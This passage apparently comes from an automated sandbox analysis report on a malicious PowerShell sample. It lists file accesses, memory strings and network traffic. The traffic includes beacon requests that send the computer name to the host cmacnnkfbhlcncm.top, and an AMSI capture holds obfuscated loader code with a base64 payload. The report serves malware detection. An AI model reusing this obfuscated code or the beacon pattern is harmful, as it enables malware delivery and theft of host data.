Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.155446555532.0000022B7D190000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.155447944943.0000022B7D51B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155450037227.0000022B7D920000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.155450237503.0000022B7D958000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.155450037227.0000022B7D920000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.155449383593.0000022B7D622000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.155447944943.0000022B7D5E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155450037227.0000022B7D920000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.155447944943.0000022B7D51B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb1. source: powershell.exe, 00000000.00000002.155450037227.0000022B7D920000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb- source: powershell.exe, 00000000.00000002.155449383593.0000022B7D5FE000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGNbOjLsGIjCOY1zdDAXBaWhIncsWeLZUfuXRZigBGSLb5rGuiw-3kttbyZeDvOfx-MZwMaSSgLYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=lTaFuKG6a8XvR2CPy2L_2oyOFHaSfNPa1uENuJ5V-oN795UnvrQeEyTaCIGBI442tvMf4lBGshfSfLublg2vK4t0RGktBX0BrZZNERLZruaCbaVqUbKxX1Ccv7DNa6xkj6iR96Nylr__0_GWG1HQnpJSA6qOvoqvpFPRQLUOxGVde7t38dmFWDW3xzT8Z1X_f6SjmQ |
Source: global traffic | HTTP traffic detected: GET /lbs39er51ghtr.php?id=computer&key=31400257058&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGNbOjLsGIjCOY1zdDAXBaWhIncsWeLZUfuXRZigBGSLb5rGuiw-3kttbyZeDvOfx-MZwMaSSgLYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=lTaFuKG6a8XvR2CPy2L_2oyOFHaSfNPa1uENuJ5V-oN795UnvrQeEyTaCIGBI442tvMf4lBGshfSfLublg2vK4t0RGktBX0BrZZNERLZruaCbaVqUbKxX1Ccv7DNa6xkj6iR96Nylr__0_GWG1HQnpJSA6qOvoqvpFPRQLUOxGVde7t38dmFWDW3xzT8Z1X_f6SjmQ |
Source: global traffic | HTTP traffic detected: GET /lbs39er51ghtr.php?id=computer&key=31400257058&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGNbOjLsGIjCOY1zdDAXBaWhIncsWeLZUfuXRZigBGSLb5rGuiw-3kttbyZeDvOfx-MZwMaSSgLYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=lTaFuKG6a8XvR2CPy2L_2oyOFHaSfNPa1uENuJ5V-oN795UnvrQeEyTaCIGBI442tvMf4lBGshfSfLublg2vK4t0RGktBX0BrZZNERLZruaCbaVqUbKxX1Ccv7DNa6xkj6iR96Nylr__0_GWG1HQnpJSA6qOvoqvpFPRQLUOxGVde7t38dmFWDW3xzT8Z1X_f6SjmQ |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B01214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B00E15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$gnpdew7u5crmlb1/$bjsawurth3e4ngc.php? |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$gnpdew7u5crmlb1/$bjsawurth3e4ngc.php?id=$env:computername&key=$qbxwcvhef&s=527 |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B01080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B00C2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B01080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B00C2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527 |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B01080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527p |
Source: powershell.exe, 00000000.00000002.155443641536.0000022B7B200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.155446555532.0000022B7D1DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.155447694964.0000022B7D3A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000000.00000002.155439091969.0000022B10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155447944943.0000022B7D51B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155447944943.0000022B7D51B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B011CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGNbOjLsGIjCOY1zdDAXBaWhIncsWeLZUfuXRZigBGSLb5rGuiw-3kttbyZeDvOfx-MZ |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B00E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGNbOjLsGIjCOY1zdDAXBaWhI |
Source: powershell.exe, 00000000.00000002.155446555532.0000022B7D1E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.155439091969.0000022B10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.155439091969.0000022B10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.155439091969.0000022B10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155447944943.0000022B7D51B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B0022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.155439091969.0000022B10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.155446555532.0000022B7D1E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.155425526999.0000022B011DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B00E15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B011CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.155425526999.0000022B011B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $cdye4qilvkb83p0.(([system.String]::new(@((-429+496),(6055-5944),(5048-(10409-5473)),(9568-(-420+(9019+(8442688/9956)))),(2596-(5217424/(19656728/(6347+3117)))),(470196/(4850-(5408-(-202+4996))))))))( $ce0t1yukvgarnz5 ) $cdye4qilvkb83p0.(([system.String]::new(@((662630/9890),(66420/(-6450+7065)),(-4200+(2729+(10112-8530))),(9293-9178),(-5771+(25179136/4288))))))()$devyrft32glosu9.(([char[]]@((-8800+(10088-1221)),(6329-(50116376/8056)),(342546/(1042+2044)),(4240-(-51+4176)),(-1590+(4325578/(429+2129)))) -join ''))()[byte[]] $42e0lhg9yozcmxj = $ce0t1yukvgarnz5.(([char[]]@((168420/2005),(1123098/(29807628/2946)),(-10053+10118),(1003884/(16929-(9705-1582))),(991116/8694),(-5524+(12949-(-2088+(18386-(17478-(63758952/7494)))))),(347149/2869)) -join ''))() $u6le5dhc2jb1gxy=$42e0lhg9yozcmxj return $u6le5dhc2jb1gxy}[System.Text.Encoding]::ascii.(([system.String]::new(@((-7004+(12804-(-3837+9566))),(163620/(8249-6629)),(8539-8423),(-9312+9395),(161124/(-8551+(89042520/(-829+(9567+220))))),(1002516/(13152-(15492690/3555))),(2302-(110+(-2826+4913))),(-2501+(1406+(-5231+(11299-4863)))),(4458-(6971-2616))))))((ehrbplwqc7t4xysu6d3ji8k9om1 "KroxaWt0YWJxMNeq7L8lPhnyzi813yom3ahTzvgNlyd3UXlVup4FahNaHUN9NjMDIkAssEYmutmOy1mEr4oRsEivc/kopePRqblG4OOABrVLg4WPS97ourDDfx+EyIOBOi7lFJ2ciN+aX6eKS8/TlaWRpOHSf5QKSENIl4GWqoniH2QKyNDXqvyrXtkMzPXFvsQG9padiIESp23R+s5PGICWk6esvZmxG0Ta0RWPlaPm84tpuvYrq/MVWtStapLKVNyQRqzB7/LjU9bKQgz/W4ws7tGSgtzu5qjGmqSztwTbTFOxpGKiHMDVFJ/XvyPF7b+a5a+DEg5UhctHtFBmNbjoDFv76UiBn/zHR422/BGij5muXHgMHZAMLEe69Cm45ebhC94PlXSj7iCC2qdt/ghawITthr5l78L0VQ2t7//ybvXdeRgVWJtcn3JAx8JGqK9Arzt+Kn9c/S+hvkBYsBIrCQzQlsyHp69apgK/zHQOgkNRPGoUlaNhOvoAWQvEtQ4ml5eAmN2qiglJyNrUBqSbPX4LCgZD0s+UjjQrnv22Hx0q+GYWFxMFEJyN9qUYqw5BG4SfTtwNQoTku5Ussti1kwT7402M+KRiJxDiP1g6oDyCqC9UhIfDvNxiRluHnjoyJtVxyOXF2UVM6SPgmV9zHuxEhu/rPcsfjqwikTUInNOhmZ436+jb759W3B9rU1BU0wAdyqAW9u8JOuqf5sacET4+/Rcf2b/Xsnj71dPOSvCn7ccoBJCeKVteNhnkXMej/n2Wf1PExcbGTewmVKyo1zsS443MVWTV+C7id/AT1iWqQZvi2KemE3+xcWNFnFzNlD8nzBs4lS7ttJvJIshkFee69q5VbFawqFW/xrgvQs9Lu4C3TM2ujOmprar9nJag4ZJBNsc7qOcVLhLC1L2msz5/Kdot+pmpcm8MrzuCet7gpB0gVDyJpHrw91Rt3pCl910Tlws+aZv5Cq5kEpqGoKfoy73dIv4WpqQKm46vD4bCMxUlv5ibb5Teb3QJaM7Xn8DjFtzKTwRBjEgBd1iFWwkYo2n7HP4K99yjyxafwZba/vLUjozDfxwMyJ914g2L2PcxihfnycxOuxLt/D9QOa2t1sC6lcHCqfYXjAf5IbOBNTmpvdohnwD+tPKI+aIt+e3YjUbjBvNLMUpzNd7Bat1Iw8F6VwRvororHoCeRxULT8C4BAPX57oSP8nG2mReBmTkkrZ0XHdqVlr/aQEyvmr7qXmu9GLsrWJ2C6P70rftxo7 |